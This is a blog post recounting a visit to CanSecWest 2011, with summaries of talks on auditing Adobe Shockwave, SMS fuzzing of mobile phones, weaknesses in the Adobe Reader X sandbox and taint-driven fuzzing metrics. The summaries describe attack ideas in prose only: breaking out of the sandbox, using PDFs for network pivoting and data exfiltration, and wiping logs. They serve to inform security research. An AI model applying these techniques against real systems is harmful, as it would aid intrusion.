CanSecWest 2011

Yes, that’s right…  After many, many years of wanting to attend this conference, I finally made it.  CanSecWest has been heralded as one of the best, top-quality security conferences that you can attend, and while I actually made it across the pond a few years ago to speak at EUSecWest, the logistics for getting up to CanSecWest just never worked out for me…  until this year.

I have to say, the hype I’ve heard over the years is well deserved.  The talks that I saw were excellent, registration was quick and smooth, the overall venue was very nice and quite accommodating, and Vancouver is a beautiful city.  I arrived on Tuesday evening before the conference and checked into the hotel.  I ended up with a corner room in the North Tower which had a nice amount of space and was near the conference hall which made it quite convenient to go back and forth between the conference and my room when I needed to work.  I actually did get a fair amount of work done as for some reason a lot of my Clients waited until I was at the conference to email me new submissions, and I was managing another round of development for the ExploitHub and reviewing its latest contracts.

The Tronapalooza party at Five Sixty on Thursday night was ++awesome.  Five Sixty can only be described as a video game bar, with both retro arcade games lining the walls, a line of racing games complete with bucket seats and wheel/petal controllers along one wall, and a HUGE projector screen upstairs for larger-than-life Street Fighter on Xbox.  The bars were open and flowing, there was a decent sized dance floor, and the DJ’s rocked it.  Had the Ms. Pacman machine been set to fast mode instead of slow, it would have been a PERFECT venue in my opinion.

One highlight of my conference experience was the massage room.  I had just spent about four and a half hours up in my hotel room poring over the latest ExploitHub contracts when I finished up and went downstairs to see what talk was currently being given.  It was about halfway through and wasn’t something that I was too terribly interested in anyway, so I decided to walk upstairs and see who was hanging out in the lobby bar.  After the first set of escalators I saw the massage room and thought to myself, “Self, that’s a PERFECT reward for just having spent four and a half hours reading contracts”, so I got myself a massage, and it was fantastic.  Whoever had the bright idea of having a massage room at the conference is a genius.

Anyhow, my notes on the few talks that I did manage to attend are below.

Black Box Auditing Adobe ShockwaveAaron Portnoy & Logan Brown

I would have named this talk “Adventures in Dynamic Binary Instrumentation” myself, as every few slides Aaron and Logan were solving some problem they had run into using some DBI technique.  While the target of the assessment they were detailing was Adobe Shockwave, I got much more out of this talk regarding the DBI techniques.  I won’t be discussing much of the ZDI-related process info or statistics that they discussed as that bit of the talk wasn’t all that interesting to me, however I must note that those bits were the motivation behind the assessment and why they developed some of the techniques that they did.

The first, and a very important point that they made, was that Adobe Shockwave is NOT Adobe Flash.  While the two products essentially do much of the same thing, and Adobe will shortly end-of-life the Shockwave product line in favor of Flash, they are two distinct and different code-bases.  Also, Shockwave has no symbols when you disassemble it, and functions are exported by ordinal, which makes taking a first look at this product unintuitive.  Also, !heap from WinDBG indicated that this product has it’s own memory manager rather than relying on the operating system’s memory manager.  One of the first things this product does when starting up is to allocate about a Gigabyte of memory from the operating system for it’s own memory manager to manage.  Instead of starting off by reversing an entire custom memory manager, Aaron and Logan decided to use Dynamic Binary Instrumentation (DBI) to hook on read functions and using pre and post-call hooks to identify where in memory data was being stored and then searching those locations for the injected fuzzer data that they were looking for.  The result was a much faster and more scalable method than using breakpoints in the debugger.

An interesting side-quest that they embarked upon during this assessment was when they noticed that the slim version of Shockwave would dynamically go out and download support DLLs for unsupported file formats.  They attempted to compromise this update feature since it’s essentially going out, grabbing executable code, and then executing it, however Adobe was smart for once and were signing these DLL packages with a digital signature including an embedded certificate, so that adventure led to a dead-end.

After fuzzing, Aaron and Logan identified approximately 2500 crashes using simple bit-flipping fuzzing techniques, and about 4000 more crashes fuzzing the RIFF file structure.  They also used another DBI technique while fuzzing to great success, which involved hooking and doing memory allocation as exceptions happened.  When a memory read exception occurred, they would inject code that would allocate memory at the location that was being attempted to be read from, simulate a heap spray by writing heap spray data there, then returning to execution and hoping for a write exception.  This technique is very effective at further verifying that a crash may be exploitable by automatically progressing to feeding the read call malicious data and logging the write exceptions rather than collecting a huge batch of read exceptions and then having to go analyze them manually.

Eventually though Aaron and Logan did have to reverse the custom memory manager but after some initial analysis discovered that it was an off-the-shelf memory manager called SmartHeap.  SmartHeap has five different APIs that all do different things.  This library still had no exported symbols except for one implementation of it for OS X if I recall correctly.  By binary diffing the different implementations against each other and using yet some more DBI techniques to gather statistics on function calls to search for correlations and patterns such as memory allocation functions and memory freeing functions having roughly the same number of calls made to them, Aaron and Logan were able to make a fair amount of progress reversing this memory manager.  It turns out that when you find vulnerabilities in products that use SmartHeap, they are relatively easy to exploit as SmartHeap has no exploitation mitigations like ASLR, heap cookies, etc.

In the end, Aaron and Logan indicated that they had found and fully developed around 20 0day vulnerabilities as well as a number of analysis tools using DBI techniques.

SMS-o-Death: From Analyzing To Attacking Mobile Phones on a Large ScaleNico Golde and Collin Mulliner

This was a fairly straightforward talk and has apparently been given at previous conferences so I’m not going to go into too much detail here.  I’ve done my own research into the GSM space about five years ago so Nico and Collin’s point about while phone hardware and software being largely proprietary and closed source, the GSM specs being open making research via fuzzing the protocols is approachable I was very familiar with.  They also made a point that I remember well about there being a TON of GSM specs.  Literally thousands and thousands of pages of text.  It was an interesting space to be working in at the time, but the sheer volume of it can indeed overwhelm you.  Anyhow, the result of their research is that after fuzzing over SMS, they identified crashes in every single product that they tested which included a lot of major phone manufacturers and models.

A Castle Made of Sand: Adobe Reader X SandboxRichard Johnson

Richard started off his talk with some interesting statistics about Adobe Reader, such as that it has about 30% market share as of June 2010 and that it’s had 358 vulnerabilities in the last 10 years, 278 of which resulted in code execution, and about 22 that were actively exploited in the wild.  It would seem that Adobe has good reason to attempt to mitigate exposure after a compromise via employing a sandbox, and their approach to using sandboxing made it’s debut in Adobe Reader X which not only employs a sandbox but is also hardened to utilize the mitigation technologies provided by the operating system such as ASLR and DEP with the PERMANENT flag.  As a result, it seems that PDF-based attacks fell by about 30% since Q2 of 2010.  Richard did note however that some 3rd-party crypto libraries that Adobe Reader includes do not make use of these mitigation technologies which, if you have Reader load the crypto features, results in about 1.5 Megabytes of non-randomized memory in the Reader process’s address space .  How ironic that loading security libraries actually introduces more opportunity for successful exploitation…

Anyhow, the “Protected Mode” sandbox includes separation of rendering code from initialization and management processes, rendering code is not allowed to write to the filesystem, and API and system calls are filtered through the parent process.  The default configuration of the sandbox includes JavaScript enabled by default although there is a JavaScript API black-list in place, ACLs for file, registry, and process access, and logging is disabled by default.  Given all this, you still have some opportunities for attack and security analysis, such as leveraging a vulnerability in the rendering process which is the most likely attack surface to load an attack DLL and use the attack DLL to attack the broker or parent process.  This attack DLL could be a fuzzer or a more targeted exploit if you’ve discovered a vulnerability in the parent or broker process.  Another interesting configuration of the sandbox is that socket and handle use is not restricted, therefore it could be possible to use a PDF file as a pivot into a target network.  Also, reading files and reading clipboard data is not restricted, so similarly a PDF could be used as a platform for the exfiltration of data.  Finally, the log file, if logging is actually enabled which stated earlier is not by default, is writable.  This makes it possible to potentially cover one’s tracks when performing an attack by wiping or cleaning up the log file.  Overall, it sounds like Adobe is taking some steps in the right direction, however there are still a number of attack vectors present as well as some fairly insecure configurations by default.

Security Defect Metrics for Targeted FuzzingDustin Duran, Matt Miller, and David Weston

This was overall a very well thought-out, performed, and summarized experiment on behalf of the researchers and the extended team that they mentioned in the credits.  That said, due to certain factors like extremely short test periods, a small number of input file formats, small numbers of crash results, and so forth, it was very obviously just that; an experiment.  I would very much like to see this same experiment performed with much larger data sets and testing periods to get a better idea of how biased the results were due to the bounds of the experiment.

First the researchers outlined their motivation for this experiment.  Three challenges with the vulnerability discovery technique of fuzzing were outlined which included the fact that while “dumb” fuzzing is blind and fast, “smart” fuzzing is generally on the opposite end of the spectrum being targeted and more apt to finding crashes, it’s also higher cost in both computing and human resources and due to this could have a much lower ROI, and there really aren’t any current fuzzing techniques that are more in the center of this spectrum.  They also cited that many researchers have a finite amount of resources and time to perform the fuzzing phase of an assessment, and that with most fuzzing approaches today, the process is fairly opaque in that there is limited visibility into the process of fuzzing as well as the code coverage achieved by any particular fuzzing activity.

After outlining the motivation and challenges, the researchers described their approach called “taint-driven” fuzzing, which was loosely defined as dynamic analysis that allows mutative target offset selection based on observing what code affects what memory locations.  Given that with this approach you’re targeting specific functions in code that are reachable via the application’s inputs, they then covered a number of different metrics that could be used for choosing your fuzzing targets.  The team presented five different metrics, the first of which was referred to as Cyclomatic Complexity which essentially meant that the more complex the function is, the more bugs it is likely to have.  Second was a metric based on crash reports from the field.  Microsoft has a fairly robust error reporting mechanism for most of it’s products so that when they crash they offer to send the crash report directly to Microsoft.  These crash reports identify the code that they crashed in, so using these reports for target selection makes absolute sense.  Third was a metric based on static analysis issues such as compiler warnings, use known-problematic sub-functions and system calls, etc.  Fourth was a metric based on the attack surface within the function presented by the instructions in the function that operate on tainted data. The fifth metric was based on perceived exploitability and was  rather interesting as it was to essentially step through every instruction in a target function, simulate a crash on that instruction, and then use WinDBG’s !exploitable logic to indicate whether or not if there is a crash there, if it is obviously exploitable or not.  Collecting the results from these simulations you can calculate a score on how potentially exploitable any given function is, assuming a crash exists.

Finally, the group disclosed their results which included lots of charts and graphs and various different views of the data from differing perspectives.  I’ll leave it to you to go dig into their research if you want the exact details, but in a nutshell, the team tested four binary file formats using five fuzzing engines made up of three that were taint-based and two control fuzzers, 6 different metrics including the five outlined above and a control which was entirely random, and spent five days on each combination of fuzzing engine, metric, and target file format.  The results were somewhat inconclusive other than an indication that the larger the code base, the more applicable taint-based fuzzing seemed to be as it’s results improved over the control fuzzing engines as the application’s code-base grew in size.

Leave a Reply